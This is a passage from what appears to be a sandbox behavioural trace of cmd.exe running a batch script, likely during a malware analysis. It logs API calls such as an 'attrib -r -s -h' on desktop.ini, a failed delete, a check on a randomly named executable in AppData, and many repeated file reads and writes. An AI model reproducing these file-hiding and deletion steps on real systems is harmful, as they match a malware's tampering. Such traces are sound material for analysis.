(hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0213.872] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0213.872] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0213.873] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0213.874] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0213.874] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0213.874] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0213.874] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0213.874] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0213.874] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0213.876] _wcsicmp (_String1="del", _String2=")") returned 59 [0213.876] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0213.876] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0213.876] _wcsicmp (_String1="IF", _String2="del") returned 5 [0213.876] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0213.876] _wcsicmp (_String1="REM", _String2="del") returned 14 [0213.876] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0213.879] _wcsicmp (_String1="type", _String2=")") returned 75 [0213.879] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0213.879] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0213.879] _wcsicmp (_String1="IF", _String2="type") returned -11 [0213.879] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0213.879] _wcsicmp (_String1="REM", _String2="type") returned -2 [0213.879] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0214.082] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0214.082] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0214.088] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0214.089] FindClose (in: hFindFile=0x282530 | out: hFindFile=0x282530) returned 1 [0214.089] FindClose (in: hFindFile=0x282530 | out: hFindFile=0x282530) returned 1 [0214.089] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0214.090] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0214.090] GetConsoleTitleW (in: lpConsoleTitle=0x24f6d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.090] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f560, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f628 | out: lpAttributeList=0x24f560, lpSize=0x24f628) returned 1 [0214.090] UpdateProcThreadAttribute (in: lpAttributeList=0x24f560, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f620, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f560, lpPreviousValue=0x0) returned 1 [0214.090] GetStartupInfoW (in: lpStartupInfo=0x24f51c | out: lpStartupInfo=0x24f51c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0214.090] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0214.091] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f5bc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f608 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini\" ", lpProcessInformation=0x24f608*(hProcess=0x50, hThread=0x4c, dwProcessId=0x994, dwThreadId=0xba0)) returned 1 [0214.206] CloseHandle (hObject=0x4c) returned 1 [0214.206] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0214.206] GetEnvironmentStringsW () returned 0x2809d0* [0214.206] FreeEnvironmentStringsW (penv=0x2809d0) returned 1 [0214.206] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0214.342] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x24f4fc | out: lpExitCode=0x24f4fc*=0x0) returned 1 [0214.342] CloseHandle (hObject=0x50) returned 1 [0214.342] _vsnwprintf (in: _Buffer=0x24f644, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f508 | out: _Buffer="00000000") returned 8 [0214.342] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0214.342] GetEnvironmentStringsW () returned 0x282580* [0214.342] FreeEnvironmentStringsW (penv=0x282580) returned 1 [0214.342] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0214.342] GetEnvironmentStringsW () returned 0x282580* [0214.342] FreeEnvironmentStringsW (penv=0x282580) returned 1 [0214.343] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f560 | out: lpAttributeList=0x24f560) [0214.343] GetConsoleTitleW (in: lpConsoleTitle=0x24f8e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.343] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\desktop.ini")) returned 0xffffffff [0214.343] GetLastError () returned 0x2 [0214.343] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1" (normalized: "c:\\users\\default\\favori~1\\msnweb~1")) returned 0x10 [0214.343] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0214.343] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0214.343] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\desktop.ini" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\desktop.ini")) returned 0xffffffff [0214.343] GetLastError () returned 0x2 [0214.344] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x24f38c | out: lpConsoleScreenBufferInfo=0x24f38c) returned 1 [0214.344] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0214.345] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0214.345] GetConsoleTitleW (in: lpConsoleTitle=0x24f87c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0214.345] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0214.346] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.346] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.346] GetFileType (hFile=0x50) returned 0x1 [0214.346] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.346] GetFileType (hFile=0x50) returned 0x1 [0214.346] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.346] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.347] GetFileType (hFile=0x50) returned 0x1 [0214.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.347] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.347] GetFileType (hFile=0x50) returned 0x1 [0214.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.347] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.347] GetFileType (hFile=0x50) returned 0x1 [0214.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.347] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.347] GetFileType (hFile=0x50) returned 0x1 [0214.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.347] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.347] GetFileType (hFile=0x50) returned 0x1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] GetFileType (hFile=0x50) returned 0x1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.348] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.348] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.348] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.348] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] GetFileType (hFile=0x50) returned 0x1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] GetFileType (hFile=0x50) returned 0x1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] GetFileType (hFile=0x50) returned 0x1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] GetFileType (hFile=0x50) returned 0x1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.348] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.348] GetFileType (hFile=0x50) returned 0x1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] GetFileType (hFile=0x50) returned 0x1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] GetFileType (hFile=0x50) returned 0x1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] GetFileType (hFile=0x50) returned 0x1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.349] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.349] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.349] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.349] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] GetFileType (hFile=0x50) returned 0x1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] GetFileType (hFile=0x50) returned 0x1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] GetFileType (hFile=0x50) returned 0x1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] GetFileType (hFile=0x50) returned 0x1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] GetFileType (hFile=0x50) returned 0x1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] GetFileType (hFile=0x50) returned 0x1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] GetFileType (hFile=0x50) returned 0x1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] GetFileType (hFile=0x50) returned 0x1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.350] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.350] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.350] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.350] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] GetFileType (hFile=0x50) returned 0x1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] GetFileType (hFile=0x50) returned 0x1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] GetFileType (hFile=0x50) returned 0x1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] GetFileType (hFile=0x50) returned 0x1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] GetFileType (hFile=0x50) returned 0x1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] GetFileType (hFile=0x50) returned 0x1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] GetFileType (hFile=0x50) returned 0x1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] GetFileType (hFile=0x50) returned 0x1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.351] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.351] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.351] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.351] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] GetFileType (hFile=0x50) returned 0x1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] GetFileType (hFile=0x50) returned 0x1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] GetFileType (hFile=0x50) returned 0x1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] GetFileType (hFile=0x50) returned 0x1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] GetFileType (hFile=0x50) returned 0x1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] GetFileType (hFile=0x50) returned 0x1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] GetFileType (hFile=0x50) returned 0x1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] GetFileType (hFile=0x50) returned 0x1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.353] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.353] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.353] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.353] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] GetFileType (hFile=0x50) returned 0x1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] GetFileType (hFile=0x50) returned 0x1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] GetFileType (hFile=0x50) returned 0x1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] GetFileType (hFile=0x50) returned 0x1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, 